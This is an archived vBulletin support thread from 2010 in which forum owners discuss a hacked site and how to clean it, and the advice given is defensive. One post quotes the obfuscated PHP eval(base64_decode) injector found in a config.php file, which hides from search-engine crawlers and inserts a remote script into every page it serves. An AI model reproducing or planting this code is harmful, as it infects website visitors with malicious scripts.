vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Forum and Server Management (https://vborg.vbsupport.ru/forumdisplay.php?f=232)
-   -   HELP...My forum has been infected with a virus (https://vborg.vbsupport.ru/showthread.php?t=242031)

nkmsw8 05-07-2010 01:07 PM
HELP...My forum has been infected with a virus
 
I have been running this forum for about two years now and early this morning I was notified that I had a virus or that my forum was hacked. The website is floridaconcealedcarry.com/Forum/index.php.

I can't login to it and don't know where to start as far as correcting this. I was set to upgrade to the new 4.0 software in a few days and so this is devastating for me.

Thanks

borbole 05-07-2010 01:24 PM
Quote:
Originally Posted by nkmsw8 (Post 2033117)
I have been running this forum for about two years now and early this morning I was notified that I had a virus or that my forum was hacked. The website is *** removed life linkj ***

I can't login to it and don't know where to start as far as correcting this. I was set to upgrade to the new 4.0 software in a few days and so this is devastating for me.

Thanks
First off, I would advice anyone against clicking the link to the infected forum for security reasons.

That said, try to do a clean up of all your vb files by overwritting them with a fresh set from the vb package, your version. Then do another thorugh checkup of all your server space and database and if everything is ok upgrade to the latest version. Also change all the passwords for your admin, ftp, cp etc. And as last but not least, inform your host about this so they can check their logs and see how exactly they got in.

Lynne 05-07-2010 01:28 PM
Can you ftp to your site? If so, replace all the files with totally default files and remove any non-vbulletin files.

Have you talked to your host? They may be able to help figure out how this happened.

nkmsw8 05-07-2010 01:29 PM
Thanks for the advice. I will be doing these things now.

--------------- Added [DATE]1273245301[/DATE] at [TIME]1273245301[/TIME] ---------------

I have gone ahead and change my ftp password but I cannot access my CP or Admin. I will download the entire site from the server onto my computer in a secures sandbox. However, how can I save the user data from these files. My oldest backup is weeks old.

Thanks.

borbole 05-07-2010 02:19 PM
Quote:
Originally Posted by nkmsw8 (Post 2033128)
Thanks for the advice. I will be doing these things now.

--------------- Added [DATE]1273245301[/DATE] at [TIME]1273245301[/TIME] ---------------

I have gone ahead and change my ftp password but I cannot access my CP or Admin. I will download the entire site from the server onto my computer in a secures sandbox. However, how can I save the user data from these files. My oldest backup is weeks old.

Thanks.
That data is stored at the db and not in the php files. Try to clean them up as suggested above and see if it would help.

nkmsw8 05-07-2010 07:22 PM
Thanks for all your help. The forum is now back up and running. I re-installed all the PHP files and that took care of the problem.

Thanks

borbole 05-07-2010 07:29 PM
Quote:
Originally Posted by nkmsw8 (Post 2033336)
Thanks for all your help. The forum is now back up and running. I re-installed all the PHP files and that took care of the problem.

Thanks
Glad to hear that. Did you also upgrade to the latest version? Also don''t forget to inform your host about it so they can investigate things on their end as well.

nkmsw8 05-07-2010 10:58 PM
I was digging around in my config.php file while changing the db password and I found this code at the top of the file.

Quote:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsg ICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl 9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9l eGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgIC AgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FH RU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVk VSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAg ICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y2 1NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04 dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgIC B9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBp ZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIG Z1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIz QzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5Nk QwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5 Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7IC AgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFE OT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2Qk IwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2 QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2Qj E5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2Jyxz dWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Nj g0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZF QUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRD A3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5 MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNj ZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigk UjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpey AgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNE QUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MT FBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1 ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzME IyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAg ICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRD k9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1 NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MT I4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJB QjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgIC AkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0y OyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OU ExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNG MUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMD M3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigk UjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09Rk FMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUEx ODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQT U2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFC OTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9IC AgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVF RjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LU VuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUy OEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5Qj EyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihw cmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0 I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4g cHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJy xnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5 RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm 4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5n bWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJv"));?>
Should this be there?

borbole 05-07-2010 11:21 PM
Quote:
Originally Posted by nkmsw8 (Post 2033454)
I was digging around in my config.php file while changing the db password and I found this code at the top of the file.



Should this be there?
No, that code should be deleted. If I were you I would also check thoroughly my server space for any thing out of ordinary. it would be best if you checked all the other .php non vb files that you might have. Like for ex from another script like wordpress, etc.

nkmsw8 05-07-2010 11:31 PM
Will do. Thanks :up:

--------------- Added [DATE]1273286835[/DATE] at [TIME]1273286835[/TIME] ---------------

How many different places in the Vbulletin software do you have to update the db password when it's changed on the db server? I'm getting a db error after I updated the password on the db and the config.php file.

Angel-Wings 05-08-2010 04:02 AM
Changing in config.php is enough. But - did you reinstalled everything and I really mean everything ?
If the machine has been "hacked" once, how can you ensure nothing has been modified and that you can trust an installed "security tool" any longer ?

Do backups before of course :)

Marco van Herwaarden 05-08-2010 12:54 PM
If there are modified files, like in your case the config.php, then the attacker most likely has not used vBulletin to enter your file system.

Most likely you are on a vulnerable server. Please contact your host and place a fresh copy of all files once your host has secured the server.

John59 05-18-2010 08:29 AM
Hi to all
i have the same problem,
It all started on the first of May
i cleaned and restore everything to a month ego except the database
and attachments (mainly photos, no programs or any code )
the problem keeps coming buck every 4 - 5 days all .php files are modified
or some del, the first time it happened i also had the above code in all .php
files.
I contacted my host and they just keep giving me advice how to check and secure
my code (VB in my case) and they do nothing,
I also come to believe that the problem is host security problem,
Do you think that if i change host (since they do not seem to accept that it is a host security problem and investigate they are doing nothing to help just polite talk and advices )
will My problems be over??
Ps. I know nothing about programing and .PHP
Only how to upload and use VB (3 years experience)

borbole 05-18-2010 02:35 PM
Quote:
Originally Posted by John59 (Post 2039047)
Hi to all
i have the same problem,
It all started on the first of May
i cleaned and restore everything to a month ego except the database
and attachments (mainly photos, no programs or any code )
the problem keeps coming buck every 4 - 5 days all .php files are modified
or some del, the first time it happened i also had the above code in all .php
files.
I contacted my host and they just keep giving me advice how to check and secure
my code (VB in my case) and they do nothing,
I also come to believe that the problem is host security problem,
Do you think that if i change host (since they do not seem to accept that it is a host security problem and investigate they are doing nothing to help just polite talk and advices )
will My problems be over??
Ps. I know nothing about programing and .PHP
Only how to upload and use VB (3 years experience)
Well, in that case then you will be better off with another host who takes security more seriously.

nkmsw8 05-18-2010 02:49 PM
Change all your passwords also. Hosting password, FTP password, Database password, and your Hosting company account login password.

John59 05-18-2010 08:31 PM
Quote:
Originally Posted by nkmsw8 (Post 2039259)
Change all your passwords also. Hosting password, FTP password, Database password, and your Hosting company account login password.
already did that days ago
the problem keeps coming buck every 4-5 days as it was mansion it seems like the only solution is to change host

maidos 05-21-2010 04:13 AM
im curious, are you possibly using dreamhost or godaddy and use wordpress for your site
my friend has the same encrypted virus which keep popping up till i removed the code for him... but if its the mentioned host, u should move away

John59 05-21-2010 05:11 AM
No i am not using wordpress
And yes my host is one of the above

daveaite 05-21-2010 08:38 AM
The issue could've have begun if you installed some "nulled" scripts. Always a bad idea as the people who null them implant ways to get into your server within those scripts.

maidos 05-21-2010 12:01 PM
Quote:
Originally Posted by daveaite (Post 2041168)
The issue could've have begun if you installed some "nulled" scripts. Always a bad idea as the people who null them implant ways to get into your server within those scripts.
in tthis case, i very much doubt it. since godaddy and dreamhost got their servers compromised and they admit it so millions of website got reported injected with that virus site

http://www.wpsecuritylock.com/ninopl...dy-case-study/
even if u dont run wordpress that site got pretty got tip how to secure ur account with godaddy

--------------- Added [DATE]1274447260[/DATE] at [TIME]1274447260[/TIME] ---------------


and a goodperson posted a script to remove the infected code on all files
http://blog.sucuri.net/2010/05/simpl...or-latest.html

John59 05-25-2010 10:06 PM
Thank you all i did what you suggested it looks like my forum is clean 5 days now with no problem


All times are GMT. The time now is 08:13 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01201 seconds
  • Memory Usage 1,793KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (8)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (21)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete